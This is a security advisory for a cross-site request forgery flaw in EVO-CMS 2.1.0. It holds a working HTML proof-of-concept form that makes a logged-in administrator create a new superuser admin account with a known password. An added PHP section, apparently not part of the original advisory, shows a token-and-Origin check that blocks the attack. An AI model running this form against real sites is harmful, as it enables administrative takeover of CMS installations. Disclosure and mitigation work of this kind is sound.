
EVO-CMS 2.1.0 Cross Site Request Forgery

Posted on 25 February 2015

# Affected software: evo cms
# Type of vulnerability: adding new admin (csrf)
# URL: http://www.evo-german.com/
# Discovered by: Provensec
# Website: http://www.provensec.com
# Version: EVO-CMS 2.1.0
# Proof of concept

An attacker was able to add a new admin because there was no protection against CSRF.

poc:

<html>
  <body>
    <form action="http://demo.opensourcecms.com/evocms/admin.php" method="POST">
      <input type="hidden" name="authors[add_name]" value="test" />
      <input type="hidden" name="authors[add_aid]" value="test123" />
      <input type="hidden" name="authors[add_email]" value="test@gmail.com" />
      <input type="hidden" name="authors[add_url]" value="http://demo.opensourcecms.com/evocms/" />
      <input type="hidden" name="authors[add_admlanguage]" value="english" />
      <input type="hidden" name="authors[add_radminsuper]" value="1" />
      <input type="hidden" name="authors[add_pwd]" value="test123" />
      <input type="hidden" name="authors[add_pwd2]" value="test123" />
      <input type="hidden" name="op" value="addadmin" />
      <input type="hidden" name="module" value="authors" />
      <input type="hidden" name="submit" value="Create Administrator" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
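
The PoC works because admin.php accepts the POST on the strength of the session cookie alone. One way to close that gap, as an added example that is not EVO-CMS code or part of the original advisory: a per-session synchronizer token plus an Origin check run before the request is dispatched. The function names, the `csrf_token` field name and the `$expectedOrigin` parameter are hypothetical, and the code assumes PHP 7+ with the admin session already started.

```php
<?php
// Added example: hypothetical helpers, not EVO-CMS code.
// Assumes session_start() has already run for the admin session.

// Return the per-session CSRF token, creating it on first use.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Hidden field to embed in every state-changing admin form,
// including the "Create Administrator" form.
function csrf_field(): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '" />';
}

// True only if the request carries the session's token and, when the
// browser sent an Origin header, that origin matches this site.
function csrf_request_is_valid(array $post, array $server, string $expectedOrigin): bool
{
    $sent  = $post['csrf_token'] ?? '';
    $known = $_SESSION['csrf_token'] ?? '';
    // hash_equals() compares in constant time; reject non-string input first.
    if (!is_string($sent) || $known === '' || !hash_equals($known, $sent)) {
        return false;
    }
    if (isset($server['HTTP_ORIGIN']) && $server['HTTP_ORIGIN'] !== $expectedOrigin) {
        return false;
    }
    return true;
}

// Guard to call at the top of admin.php, before any "op" is handled.
function require_csrf_or_die(string $expectedOrigin): void
{
    if (($_SERVER['REQUEST_METHOD'] ?? 'GET') === 'POST'
        && !csrf_request_is_valid($_POST, $_SERVER, $expectedOrigin)) {
        http_response_code(403);
        exit('Invalid or missing CSRF token');
    }
}
```

A cross-site form like the PoC cannot read the victim's session token, so its POST fails the `hash_equals()` check and is answered with 403. Setting the session cookie with `SameSite=Lax` or `Strict` adds a second layer in browsers that support it.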

 
